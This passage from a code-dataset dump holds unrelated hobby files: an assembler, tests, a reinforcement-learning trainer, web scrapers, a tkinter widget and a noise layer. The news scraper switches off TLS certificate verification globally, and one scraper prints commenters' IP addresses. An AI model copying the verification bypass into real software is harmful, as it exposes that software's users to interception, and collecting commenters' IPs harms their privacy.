instructions.extend(imm_patches)\n parsed_instructions.append(parsed_instruction)\n \n return parsed_instructions, instructions, labels\n\ndef asm_instruction(parsed_instruction, labels = {}):\n instr_name, args, offset, target_label, line_num, current_size = parsed_instruction\n spec = get_spec(instr_name)\n if has_label(parsed_instruction):\n return encode_by_spec(spec,\n replace_label_by(args,\n label_to_imm(labels,\n target_label,\n offset)),\n line_num,\n {\"pc\": offset, \"current_size\": current_size, \"line_num\": line_num})\n else:\n return encode_by_spec(spec, args, line_num, {\"pc\": offset, \"current_size\": current_size, \"line_num\": line_num})\n\n# utilities for label resolution\ndef update_instruction_sizes(labelled_instructions, instructions, labels):\n is_size_changed = False\n for i in range(0, len(labelled_instructions)):\n offset = labelled_instructions[i][2]\n current_size = labelled_instructions[i][5]\n imm_patches = asm_instruction(labelled_instructions[i], labels)\n if len(imm_patches) > current_size:\n diff = len(imm_patches) - current_size \n # update current_size\n labelled_instructions[i][5] = len(imm_patches)\n # update instructions\n for _ in range(0, diff):\n instructions.insert(offset+1, 0) \n # update labels\n for k in labels.keys():\n if labels[k] > offset:\n labels[k] += diff\n # update info for all instructions with label references\n for j in range(0, len(labelled_instructions)):\n if labelled_instructions[j][2] > offset:\n labelled_instructions[j][2] += diff\n # set is_size_changed flag to resolve labels again\n is_size_changed = True\n return labelled_instructions, instructions, labels, is_size_changed\n\n# utilities to output asm\ndef asm_lines(lines):\n \"\"\"\n Asm given lines and returns machine codes in binary format. \n\n Parameters\n ----------\n lines : list of str\n lines to be assembled.\n\n Returns\n -------\n _ : bytes\n rv32im machine codes in binary format.\n \"\"\"\n \n\n # parse lines & quick encode\n ################\n parsed_instructions, instructions, labels = quick_encode(lines)\n \n # resolve instruction sizes\n ################ \n # first, we have to check the existance of labels.\n if any(list(map(lambda x: has_label(x) and not is_label_valid(x, labels),\n parsed_instructions))):\n instr = next(filter(lambda x: has_label(x) and not is_label_valid(x, labels), parsed_instructions))\n target_label = instr[3]\n line_num = instr[4]\n exit_with_error(\"[-] invalid label found at {}: {}\".format(line_num, target_label))\n\n # second, we have to fix the size of each labelled instruction.\n # here we assume that the bigger the imm is, the more space is used.\n is_size_changed = True\n labelled_instructions = list(filter(has_label, parsed_instructions))\n while is_size_changed:\n labelled_instructions, instructions, labels, is_size_changed = \\\n update_instruction_sizes(labelled_instructions, instructions, labels)\n\n # resolve labels and emit\n ################\n # after fixing the size of instructions, we can patch all the labels with imm!\n for labelled_instruction in labelled_instructions:\n offset = labelled_instruction[2]\n imm_patches = asm_instruction(labelled_instruction, labels)\n for j in range(0, len(imm_patches)):\n instructions[offset+j] |= imm_patches[j]\n \n # pack all instructions\n ################\n assembled_code = b''.join([struct.pack(' [ ...]\".format(sys.argv[0]))\n exit(1)\n\n mcode, labels = asm_files(sys.argv[2:])\n with open(sys.argv[1], 'wb') as f:\n f.write(mcode)\n with open(sys.argv[1] + '.symbols', 'w') as f:\n f.write('\\n'.join(map(lambda x: '{} {}'.format(x[0], str(4 * x[1])), labels.items())))\n \nif __name__ == '__main__':\n main()\n","repo_name":"cpuex2019-7th/assembler","sub_path":"cpuex_asm/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14759930163","text":"from queries.unique_rel import UniqueRel\nfrom queries.unique_node import UniqueNode\nimport flask\nimport pytest\n\nd = dict(test_prop1=\"test_val1\", test_prop2=\"test_val2\")\n\n\ndef test_create_rel(reset_db):\n app = flask.Flask(__name__)\n with app.app_context():\n u1 = UniqueNode(uid='testid1', propone='propone', proptwo='proptwo')\n u2 = UniqueNode(uid='testid2', propone='propone', proptwo='proptwo')\n\n # create nodes in graph\n u1.create_node()\n u2.create_node()\n\n # create rel\n r1 = UniqueRel(**d)\n r1.create_rel(u1, u2)\n\n # check rel created\n props = UniqueRel.get_rel_props(u1, u2)\n assert props['test_prop1'] == \"test_val1\"\n assert props['test_prop2'] == \"test_val2\"\n\n\ndef test_del_rel(reset_db):\n app = flask.Flask(__name__)\n with app.app_context():\n u1 = UniqueNode(uid='testid1', propone='propone', proptwo='proptwo')\n u2 = UniqueNode(uid='testid2', propone='propone', proptwo='proptwo')\n\n # create nodes in graph\n u1.create_node()\n u2.create_node()\n\n # delete rel\n UniqueRel.delete_rel(u1, u2)\n\n # check rel deleted\n with pytest.raises(LookupError):\n UniqueRel.get_rel_props(u1, u2)\n","repo_name":"MRCIEU/opengwas-api","sub_path":"app/queries/tests/test_unique_rel.py","file_name":"test_unique_rel.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"19369129497","text":"class Employee:\r\n def __init__(self,n,d,s,lb):\r\n self.name=n\r\n self.designation=d\r\n self.salary=s\r\n self.leaveBalance=lb\r\nclass Organization:\r\n def __init__(self,elist):\r\n self.employee_list=elist\r\n def checkLeaveEligibility(self,empname,tl,nol):\r\n for i in self.employee_list:\r\n\r\n if i.name==empname:\r\n for a,b in i.leaveBalance.items():\r\n if a==tl:\r\n if b>=nol:\r\n i.leaveBalance[a]=b-nol\r\n\r\n return 'True'\r\n else:\r\n return 'False'\r\n return 'not_found'\r\n def display_details(self,name):\r\n for i in self.employee_list:\r\n if i.name==name:\r\n for a,b in i.leaveBalance.items():\r\n print(a+':'+str(b))\r\nelist=[]\r\nnum=int(input())\r\nfor i in range(num):\r\n leaves={}\r\n name=str(input())\r\n designation=str(input())\r\n salary=int(input())\r\n for j in range(int(input())):\r\n tl=str(input())\r\n nol=int(input())\r\n leaves[tl]=nol\r\n elist.append(Employee(name,designation,salary,leaves))\r\n\r\n\r\nobj=Organization(elist)\r\nempname=str(input())\r\n\r\ntl=str(input())\r\nnol=int(input())\r\nif (obj.checkLeaveEligibility(empname,tl,nol)=='True'):\r\n print('Leave Granted')\r\n obj.display_details(empname)\r\nelif obj.checkLeaveEligibility(empname, tl, nol) == 'False':\r\n print('Leave Not Granted')\r\n obj.display_details(empname)\r\nelif obj.checkLeaveEligibility(empname, tl, nol) == 'not_found':\r\n print('Leave Not Granted')\r\n print('No Employee Found')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"saipraveen333/Coding-Samples","sub_path":"EMPLOYEE_OOPS.py","file_name":"EMPLOYEE_OOPS.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4859334051","text":"''' dqn learning '''\n\n# import tensorflow as tf\nimport tensorflow.compat.v1 as tf\n\nimport tictactoe.utils as utils\nfrom tictactoe.agent import DualAgent\n\nfrom .agent import MyAgent\n\ntf.disable_v2_behavior()\n\nAGENT1_DATA_PATH = \"./models/pgn1.ckpt\"\nAGENT2_DATA_PATH = \"./models/pgn2.ckpt\"\n\ndef build_agent():\n ''' build agent for learning '''\n # create pgn agent1 & agent2\n agent1 = MyAgent()\n agent2 = MyAgent()\n\n sess = tf.Session()\n agent1.set_session(sess)\n agent2.set_session(sess)\n sess.run(tf.global_variables_initializer())\n\n agent1.load(AGENT1_DATA_PATH)\n agent2.load(AGENT2_DATA_PATH)\n\n return agent1, agent2\n\nMAX = 1000000\nSTEP = 1000\n\ndef learn(env, best_agent):\n ''' Policy Gradient learning '''\n\n agent1, agent2 = build_agent()\n\n dual = DualAgent(agent1, agent2)\n dual_x = DualAgent(agent1, best_agent)\n dual_o = DualAgent(best_agent, agent2)\n\n full_tie = 0\n\n for step in range(0, MAX, STEP):\n dual.set_train_mode(True)\n for _ in range(STEP):\n utils.play(env, dual, render=False)\n\n agent1.save(AGENT1_DATA_PATH)\n agent2.save(AGENT2_DATA_PATH)\n\n dual.set_train_mode(False)\n\n count1 = {-1: 0, 1: 0, 0: 0}\n for _ in range(100):\n winner = utils.play(env, dual_o)\n count1[winner] += 1\n\n count2 = {-1: 0, 1: 0, 0: 0}\n for _ in range(100):\n winner = utils.play(env, dual_x)\n count2[winner] += 1\n\n print(step+STEP, count1[1], count1[-1], count1[0], count2[1], count2[-1], count2[0])\n\n # 5 consecutive full tie, learning completed\n if count1[-1] == 0 and count2[1] == 0:\n full_tie += 1\n if full_tie == 5:\n break\n else:\n full_tie = 0\n","repo_name":"jaywon99/tictactoe","sub_path":"players/pgn/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15671393718","text":"import json\nimport requests\nimport time\n\n\n\ndef test():\n url = 'https://api-zero.livere.com/v1/comments/list?callback=jQuery112403473268296510956_1531502963311&limit=10&repSeq=4272904&requestPath=%2Fv1%2Fcomments%2Flist&consumerSeq=1020&livereSeq=28583&smartloginSeq=5154&_=1531502963313'\n\n res = requests.get(url)\n json_string = res.text\n json_string = json_string[json_string.find('{'):-2]\n data = json.loads(json_string)\n commen_list = data['results']['parents']\n for comm in commen_list:\n print(comm['name'] + ':' + comm['content'] + '(IP:%s)' % comm['ipAddress'])\n\n# https://www.toutiao.com/api/search/content/?\n# aid=24&app_name=web_search&offset=0&\n# format=json&keyword=python&autoload=true&count=20&en_qc=1&\n# cur_tab=1&from=search_tab&pd=synthesis×tamp=1554519458678\n#\n# https://www.toutiao.com/api/search/content/?\n# aid=24&app_name=web_search&offset=20&\n# format=json&keyword=python&autoload=true&count=20&en_qc=1&\n# cur_tab=1&from=search_tab&pd=synthesis×tamp=1554519548753\n\ndef today_news():\n headers = {\n \"UserAgent\": 'Mozilla / 5.0(Windows NT 6.1;WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 69.0.3497.100Safari / 537.36'\n }\n url = 'https://www.toutiao.com/api/search/content/?aid=24&app_name=web_search&offset={}&format=json&keyword=python&autoload=true&count=20&en_qc=1&cur_tab=1&from=search_tab&pd=synthesis'\n\n #print(data['data'][6]['article_url'])\n with open('./toutiao.txt', 'w') as f:\n for i in range(10):\n uri = url.format(str(i * 20))\n print(uri)\n res = requests.get(uri, headers=headers)\n time.sleep(1)\n json_string = res.text\n data = json.loads(json_string)\n for i in data['data']:\n if 'article_url' in i:\n f.write(i['title'] + ':' + i['article_url'] + '\\n')\n print(i['title'], i['article_url'])\n\n\n\n f.close()\n\n\n\n\n\n\n\n\ndef main():\n today_news()\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"iiclear/scarapy_job","sub_path":"AJAX.py","file_name":"AJAX.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12716068336","text":"from starlette.responses import RedirectResponse\nfrom starlette.templating import Jinja2Templates\nfrom starlette.requests import Request\n\nfrom http import HTTPStatus\n\ntemplates = Jinja2Templates(directory=\"templates/guest\")\n\nasync def signin(request: Request):\n \n if request.cookies.get(\"logged-in\"):\n \n return RedirectResponse(\"/\", HTTPStatus.FOUND)\n \n return templates.TemplateResponse(\"signin.jinja2\", {\n \"request\": request\n })\n \nasync def register(request: Request):\n \n if request.cookies.get(\"logged-in\"):\n \n return RedirectResponse(\"/\", HTTPStatus.FOUND) \n \n return templates.TemplateResponse(\"register.jinja2\", {\n \"request\": request\n })","repo_name":"MatthewXiatthew/Tennis69420","sub_path":"tennis360/router/guest/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2199852099","text":"#a variable delaring the number of people types there are.\ntypes_of_people = 10\n#a string to use the data from the variable above. Stored in a variable for later use.\nx = f\"There are {types_of_people} types of people\"\n\n#a varibale with the word binary in it.\nbinary = \"binary\"\n#a variable with the word don't in it.\ndo_not = \"don't\"\n#a string to use the data from the variables above. Stored in a variable for later use.\ny = f\"Those who know {binary} and those who {do_not}.\" #a string (or two) inside a string\n\n#a statement to print the x variable defined on line 4.\nprint(x)\n#a statement to print the y variable defined on line 11.\nprint(y)\n\n#another pritn statement to print the variable x. This time with some added text.\nprint(f\"I said: {x}.\") #a string inside a string.\n#another pritn statement to print the variable y. This time with some added text.\nprint(f\"I also said: '{y}'\") #a string inside a string.\n\n#a boolean. To keep me on my toes.\nhilarious = False\n#a string with some curly brackets for later formatting.\njoke_evaluation = \"Isn't that joke so funny?! {}\"\n#a print statement using the boolena and string with formating directly above.\nprint(joke_evaluation.format(hilarious))\n\n# a variable, w, containing a string.\nw = \"This is the left side of...\"\n# a varibale, e, containing further string text\ne = \"a string with a right side.\"\n\n# a print statement using the two variables above and concatcenating them together.\nprint(w + e)\n\n# There are three strings inside of strings in this exercise. The first posibility on line 4 is actually an integer inside of a string.\n# The second potential is the print statement on line 28. This is a string with a boolean, not another string.\n","repo_name":"nikkiredfern/learning_python","sub_path":"LPTHW/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"2665596011","text":"from newspaper import Article\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\n\nfrom news.models import Newsmodel, cartegory\nimport pickle\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef main():\n\n f = open('forbidenlist.pkl', 'rb')\n a = pickle.load(f)\n all = []\n sitelist = [\n \"https://dailytimes.ng/category/news/\",\n \"https://tribuneonlineng.com/category/latest-news/\",\n \"https://twmagazine.net/category/beauty/\",\n \"https://twmagazine.net/category/fashion/\",\n \"https://twmagazine.net/category/living/\",\n \"https://twmagazine.net/category/love/\",\n \"https://guardian.ng/latest/\",\n \"https://www.vanguardngr.com/news\",\n \"https://edition.cnn.com/africa\",\n \"https://edition.cnn.com/world\",\n \"https://edition.cnn.com/entertainment\",\n \"https://edition.cnn.com\",\n \"https://thenationonlineng.net/category/news/\"\n ]\n\n while True:\n\n for site in sitelist:\n req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})\n\n html = urlopen(req) # Insert your URL to extrac\n page = BeautifulSoup(html.read(), 'lxml')\n for link in page.find_all('a'):\n b = link.get('href')\n\n if b not in a:\n if b not in all:\n all.append(b)\n\n if all.count(b) == 2:\n all.remove(b)\n\n print(len(all))\n for each in all:\n l = ['vanguard', 'nation', 'cnn', 'theguardian', '127', 'dailytimes', 'dailytrust',\n 'tribune']\n '''\n\t\t\t\tthe purpose of this is to fetch the image corespond with the model\n\t\t\t\te.g {source}.jpg in template\n\t\t\t\t'''\n source = None\n if each==None:\n continue\n for s in l:\n if s in each:\n source = s\n break\n else:\n pass\n\n try:\n url = each\n article = Article(url)\n article.download()\n article.parse()\n\n n = Newsmodel()\n print(article.title)\n n.author = article.authors\n n.article_img = article.top_img\n n.heading = article.title\n n.content = article.text\n n.source_url = each\n n.source = source+'.png'\n n.save()\n print(\"saved\")\n n.newscat.add(cartegory.objects.get(cat=\"News\"))\n n.save()\n\n except:\n\n print('url error')\n a.extend(all)\n all.clear()\n\n with open('forbidenlist.pkl', 'wb') as f:\n pickle.dump(a, f)\n badtit = ['News', 'Latest Nigeria News, Nigerian Newspapers, Politics', '',\n 'Vanguard News', 'Vanguard News, Sports and Business from vanguard Newspapers -',\n 'Page'\n ]\n for i in badtit:\n Newsmodel.objects.filter(heading=i).delete()\n\n# main()\n# import pickle\n# from concurrent.futures import ThreadPoolExecutor\n# from urllib.request import urlopen, Request\n# from bs4 import BeautifulSoup\n# from newspaper import Article\n# from news.models import Newsmodel, cartegory\n# import ssl\n# ssl._create_default_https_context = ssl._create_unverified_context\n\n\n# def scrape_site(site):\n# forbidden_list = pickle.load(open('forbidenlist.pkl', 'rb'))\n# news_links = []\n# source = None\n# l = ['vanguard', 'nation', 'cnn', 'theguardian',\n# '127', 'dailytimes', 'dailytrust', 'tribune']\n# req = Request(site, headers={'User-Agent': 'Mozilla/5.0'})\n# with urlopen(req) as html:\n# page = BeautifulSoup(html, 'lxml')\n# for link in page.find_all('a'):\n# url = link.get('href')\n# if url and url not in forbidden_list and url not in news_links:\n# news_links.append(url)\n\n# for link in news_links:\n# if any(s in link for s in l):\n# for s in l:\n# if s in link:\n# source = s + '.png'\n# break\n# break\n\n# news = []\n# # with ThreadPoolExecutor() as executor:\n# for link in news_links:\n# print(link)\n# if link not in forbidden_list:\n# news.append(scrape_news(link, source))\n\n# for n in news:\n# try:\n# data = n.result()\n# if data:\n# Newsmodel.objects.create(\n# newscat=cartegory.objects.get(cat='News'),\n# author=data['author'],\n# article_img=data['image_url'],\n# heading=data['title'],\n# content=data['text'],\n# source_url=data['source_url'],\n# source=source\n# )\n# except Exception as e:\n# print(f\"Error processing news: {e}\")\n# forbidden_list.extend(news_links)\n# with open('forbidenlist.pkl', 'wb') as f:\n# pickle.dump(forbidden_list, f)\n\n\n# def scrape_news(link, source):\n# try:\n# article = Article(link)\n# article.download()\n# article.parse()\n# return {\n# 'author': article.authors,\n# 'image_url': article.top_img,\n# 'title': article.title,\n# 'text': article.text,\n# 'source_url': link,\n# 'source': source,\n# }\n# except Exception as e:\n# print(f\"Error downloading news: {e}\")\n# return None\n\n\n# def main():\n# site_list = [\n# # \"https://dailytimes.ng/category/news/\",\n# \"https://tribuneonlineng.com/category/latest-news/\",\n# \"https://twmagazine.net/category/beauty/\",\n# \"https://twmagazine.net/category/fashion/\",\n# \"https://twmagazine.net/category/living/\",\n# \"https://twmagazine.net/category/love/\",\n# \"https://guardian.ng/latest/\",\n# \"https://www.vanguardngr.com/news\",\n# \"https://edition.cnn.com/africa\",\n# \"https://edition.cnn.com/world\",\n# \"https://edition.cnn.com/entertainment\",\n# \"https://edition.cnn.com\",\n# \"https://thenationonlineng.net/category/news/\"\n# ]\n# for site in site_list:\n# scrape_site(site)\n\n# # delete news with bad titles\n# bad_titles = ['News', 'Latest Nigeria News, Nigerian Newspapers, Politics', '',\n# 'Vanguard News', 'Vanguard News, Sports and Business from vanguard Newspapers -', 'Page']\n# Newsmodel.objects.filter(heading__in=bad_titles).delete()\n\n\n# if __name__ == \"__main__\":\n# main()\n","repo_name":"quadratoms/whotnews","sub_path":"news/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74819511658","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom tkinter import Canvas, Frame, Scrollbar\nfrom componentProperty import update_all_property, get_default_component_info\n\n\ndef create_default_component(master, component_type, component_name, prop=None, use_name=True):\n \"\"\"\n 创建默认控件\n :param master: 父控件\n :param component_type: 控件类型\n :param component_name: 控件名字\n :param prop: 需要更新的属性\n :param use_name: 是否使用控件名字\n :return: 控件\n \"\"\"\n class_name = getattr(sys.modules[__name__], component_type)\n if use_name:\n component = class_name(master, name=component_name)\n else:\n component = class_name(master)\n\n component_info = get_default_component_info(component_type, prop)\n update_all_property(component, component_info, component_type)\n\n return component, component_info\n\n\nclass ScrollCanvas(Canvas):\n\n def __init__(self, master=None, cnf={}, **kw):\n\n Canvas.__init__(self, master, cnf, **kw)\n self.is_show_scroll_x = 1 # 是否显示水平滚动条\n self.is_show_scroll_y = 1 # 是否显示垂直滚动条\n self.is_always_show_scroll = 1 # 是否总是显示滚动条\n self.scroll_x_height = 17 # 水平滑动条默认高度\n self.scroll_x_width = 200 # 水平滑动条默认宽度\n self.scroll_y_height = 200 # 垂直滑动条默认高度\n self.scroll_y_width = 17 # 垂直滑动条默认宽度\n\n def set_is_show_scroll_x(self, is_show_scroll_x):\n \"\"\"\n 设置是否显示水平滑动条\n :param is_show_scroll_x:是否显示\n :return:None\n \"\"\"\n if self.is_show_scroll_x == is_show_scroll_x:\n return\n self.is_show_scroll_x = is_show_scroll_x\n self.do_layout_need_control()\n\n def get_is_show_scroll_x(self):\n \"\"\"\n 获取是否显示水平滑动条\n :return:bool\n \"\"\"\n return self.is_show_scroll_x\n\n def set_is_show_scroll_y(self, is_show_scroll_y):\n \"\"\"\n 设置是否显示垂直滑动条\n :param is_show_scroll_y:是否显示\n :return:None\n \"\"\"\n if self.is_show_scroll_y == is_show_scroll_y:\n return\n self.is_show_scroll_y = is_show_scroll_y\n self.do_layout_need_control()\n\n def get_is_show_scroll_y(self):\n \"\"\"\n 获取是否显示垂直滑动条\n :return:bool\n \"\"\"\n return self.is_show_scroll_y\n\n def set_is_always_show_scroll(self, is_always_show_scroll):\n \"\"\"\n 设置是否一直显示滑动条\n :param is_always_show_scroll:是否一直显示\n :return:None\n \"\"\"\n if self.is_always_show_scroll == is_always_show_scroll:\n return\n self.is_always_show_scroll = is_always_show_scroll\n self.do_layout_need_control()\n\n def get_is_always_show_scroll(self):\n \"\"\"\n 获取是否一直显示滑动条\n :return:bool\n \"\"\"\n return self.is_always_show_scroll\n\n @property\n def scroll_bar_x(self):\n return self.children.get(\"scroll_bar_x\", None)\n\n @property\n def scroll_bar_y(self):\n return self.children.get(\"scroll_bar_y\", None)\n\n @property\n def slide_window(self):\n return self.children.get(\"slide_window\", None)\n\n def on_update(self):\n \"\"\"\n 初始化后会被调用,在这里创建滚动条和滑动窗口\n :return: None\n \"\"\"\n self.create_need_control()\n self.update_scroll()\n\n def create_need_control(self):\n \"\"\"\n 创建所需控件\n :return:None\n \"\"\"\n self.create_slide_window()\n self.create_scroll_bar()\n self.do_layout_need_control()\n\n def create_slide_window(self):\n \"\"\"\n 创建滑动窗口\n :return:None\n \"\"\"\n prop = {\n \"background\": self[\"background\"],\n }\n create_default_component(self, \"Frame\", \"slide_window\", prop)\n self.create_window((1, 1), window=self.slide_window, anchor=\"nw\")\n\n self.slide_window.bind(\"\", self.scroll_slide_window_y)\n self.slide_window.bind(\"\", self.scroll_slide_window_x)\n\n def create_scroll_bar(self):\n \"\"\"\n 创建滑动条\n :return:None\n \"\"\"\n prop_scroll_y = {\n \"command\": self.yview,\n \"width\": self.scroll_y_width, \"height\": self.scroll_y_height\n }\n create_default_component(self, \"Scrollbar\", \"scroll_bar_y\", prop_scroll_y)\n\n prop_scroll_x = {\n \"orient\": \"horizontal\", \"command\": self.xview,\n \"width\":self.scroll_x_width, \"height\":self.scroll_x_height\n }\n create_default_component(self, \"Scrollbar\", \"scroll_bar_x\", prop_scroll_x)\n\n # 绑定滑动条事件\n self.configure(xscrollcommand=self.scroll_bar_x.set)\n self.configure(yscrollcommand=self.scroll_bar_y.set)\n\n def do_layout_need_control(self):\n \"\"\"\n 重新布局界面\n :return:None\n \"\"\"\n self.do_layout_scroll_bar_x()\n self.do_layout_slide_window()\n self.do_layout_scroll_bar_y()\n\n def do_layout_scroll_bar_x(self):\n \"\"\"\n 重新布局水平滑动条\n :return: None\n \"\"\"\n if self.scroll_bar_x is None:\n return\n\n self.scroll_bar_x.place_configure(x=1, y=int(self[\"height\"]) - self.scroll_x_height)\n self.scroll_bar_x.place_configure(width=int(self[\"width\"]) - int(self.scroll_bar_y.place_info().get(\"width\", 0)) - 1)\n self.scroll_bar_x.place_configure(height=self.scroll_x_height)\n\n # 隐藏水平滑动条\n if not self.get_is_show_scroll_x():\n self.scroll_bar_x.place_forget()\n\n def do_layout_scroll_bar_y(self):\n \"\"\"\n 重新布局垂直滑动条\n :return: None\n \"\"\"\n if self.scroll_bar_y is None:\n return\n\n self.scroll_bar_y.place_configure(x=int(self[\"width\"]) - int(self.scroll_y_width), y=2)\n self.scroll_bar_y.place_configure(width=self.scroll_y_width)\n self.scroll_bar_y.place_configure(height=int(self[\"height\"]) - 2)\n\n # 隐藏垂直滑动条\n if not self.get_is_show_scroll_y():\n self.scroll_bar_y.place_forget()\n\n def do_layout_slide_window(self):\n \"\"\"\n 重新布局slide window\n :return: None\n \"\"\"\n if self.slide_window is None:\n return\n\n self.slide_window[\"width\"] = int(self[\"width\"])\n self.slide_window[\"height\"] = int(self[\"height\"])\n\n def update_scroll(self):\n \"\"\"\n 更新滑动条\n :return:None\n \"\"\"\n self.update_scroll_vertical()\n self.update_scroll_horizontal()\n self.configure(scrollregion=self.bbox(\"all\"))\n\n def update_scroll_vertical(self):\n \"\"\"\n 更新垂直滑动条\n :return:None\n \"\"\"\n pos_y = self.calc_slide_window_height()\n is_always_show = self.get_is_always_show_scroll()\n\n visible = False\n if pos_y > int(self[\"height\"]):\n self.slide_window[\"height\"] = pos_y + 20\n visible = True\n else:\n if int(self.slide_window[\"height\"]) > int(self[\"height\"]):\n self.slide_window[\"height\"] = int(self[\"height\"]) - self.scroll_x_height\n\n # 一直显示垂直滑动条\n if is_always_show:\n visible = True\n\n if not self.get_is_show_scroll_y():\n visible = False\n\n if visible:\n self.do_layout_scroll_bar_y()\n else:\n self.scroll_bar_y.place_forget()\n\n def calc_slide_window_height(self):\n \"\"\"\n 计算滑动窗口的高度\n :return: int\n \"\"\"\n pos_y = 0\n\n for (childName, child) in self.slide_window.children.items():\n if int(child.place_info()[\"y\"]) + child.winfo_reqheight() > pos_y:\n pos_y = int(child.place_info()[\"y\"]) + child.winfo_reqheight()\n\n return pos_y\n\n def update_scroll_horizontal(self):\n \"\"\"\n 更新水平滑动条\n :return:None\n \"\"\"\n pos_x = self.calc_slide_window_width()\n is_always_show = self.get_is_always_show_scroll()\n\n visible = False\n if pos_x > int(self[\"width\"]):\n self.slide_window[\"width\"] = pos_x + 20\n visible = True\n else:\n if int(self.slide_window[\"width\"]) > int(self[\"width\"]):\n self.slide_window[\"width\"] = int(self[\"width\"]) - self.scroll_y_width\n\n # 一直显示垂直滑动条\n if is_always_show:\n visible = True\n\n if not self.get_is_show_scroll_x():\n visible = False\n\n if visible:\n self.do_layout_scroll_bar_x()\n else:\n self.scroll_bar_x.place_forget()\n\n def calc_slide_window_width(self):\n \"\"\"\n 计算滑动窗口的宽度\n :return: int\n \"\"\"\n pos_x = 0\n\n for (childName, child) in self.slide_window.children.items():\n if int(child.place_info()[\"x\"]) + child.winfo_reqwidth() > pos_x:\n pos_x = int(child.place_info()[\"x\"]) + child.winfo_reqwidth()\n\n return pos_x\n\n def scroll_slide_window_y(self, event):\n \"\"\"\n 垂直滚动页面\n :param event:\n :return:None\n \"\"\"\n if int(self.slide_window[\"height\"]) <= int(self[\"height\"]):\n return\n units = -5 if event.delta > 0 else 5\n self.yview_scroll(units, \"units\")\n\n def scroll_slide_window_x(self, event):\n \"\"\"\n 水平滚动页面\n :param event:\n :return:None\n \"\"\"\n if int(self.slide_window[\"width\"]) <= int(self[\"width\"]):\n return\n units = -5 if event.delta > 0 else 5\n self.xview_scroll(units, \"units\")\n\n def get_child_master(self):\n return self.slide_window\n\n def on_end_drag_master(self):\n self.update_scroll()\n\n def on_size_change(self):\n \"\"\"\n 窗口尺寸变化时的处理\n :return: None\n \"\"\"\n self.do_layout_need_control()\n\n def refresh_slide_window_bg(self):\n \"\"\"\n 刷新slide_window背景\n :return: None\n \"\"\"\n prop = {\n \"background\": self[\"background\"],\n }\n self.slide_window.configure(prop)\n\n @staticmethod\n def create_default(master, prop=None):\n return create_default_component(master, \"ScrollCanvas\", None, prop, False)\n","repo_name":"archmage9999/tkinterEditor","sub_path":"ScrollCanvas.py","file_name":"ScrollCanvas.py","file_ext":"py","file_size_in_byte":10858,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"92"} +{"seq_id":"644599017","text":"from __future__ import annotations\n\nimport torch\nimport torch.nn as nn\n\n\nclass Noise(nn.Module):\n \"\"\"Poisson-Gaussian noise layer.\n\n Noise layer based on the reparameterization trick\n https://stats.stackexchange.com/questions/199605/how-does-the-reparameterization-trick-for-vaes-work-and-why-is-it-important\n \"\"\"\n\n def __init__(self, gain, readnoise_std, bg_min, bg_max, num_shots):\n \"\"\"__init__ for Noise.\"\"\"\n super().__init__()\n if isinstance(gain, float):\n gain = [gain for _ in range(num_shots)]\n if isinstance(readnoise_std, float):\n readnoise_std = [readnoise_std for _ in range(num_shots)]\n assert len(gain) == num_shots\n assert len(readnoise_std) == num_shots\n self.bg_min = bg_min\n self.bg_range = bg_max - bg_min\n\n self.register_buffer(\n \"gain\", torch.tensor(gain).reshape(1, -1, 1, 1), persistent=False\n )\n self.register_buffer(\n \"sigma\", torch.tensor(readnoise_std).reshape(1, -1, 1, 1), persistent=False\n )\n\n def forward(self, x):\n \"\"\"Compute the forward step.\"\"\"\n batch_sz = x.shape[0]\n bg = (\n self.bg_min + self.bg_range * torch.rand(batch_sz, device=self.gain.device)\n ).reshape(batch_sz, 1, 1, 1)\n x_plus_bg = x + bg\n unit_noise = torch.randn_like(x)\n noise_sigma = torch.sqrt(x_plus_bg) + self.sigma / self.gain\n noisy_img = self.gain * (x_plus_bg + noise_sigma * unit_noise)\n return noisy_img\n","repo_name":"computational-imaging/multishot-localization-microscopy","sub_path":"module/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"27057585272","text":"import random\nfrom unittest import mock\n\nfrom django.core.handlers.wsgi import WSGIRequest\nfrom django.test import TestCase\n\nfrom bk_resource.utils.local import local\nfrom bk_resource.utils.request import (\n get_moke_request,\n get_request_username,\n set_local_username,\n)\nfrom tests.constants.utils.request import DEFAULT_USERNAME\nfrom tests.mock.utils.request import GetLocalRequest\n\n\nclass TestGetRequestUsername(TestCase):\n def test(self):\n self.assertIsNotNone(get_request_username())\n\n @mock.patch(\"blueapps.utils.request_provider.get_local_request\", GetLocalRequest)\n def test_error(self):\n self.assertIsNotNone(get_request_username())\n\n @mock.patch(\"blueapps.utils.request_provider.get_local_request\", 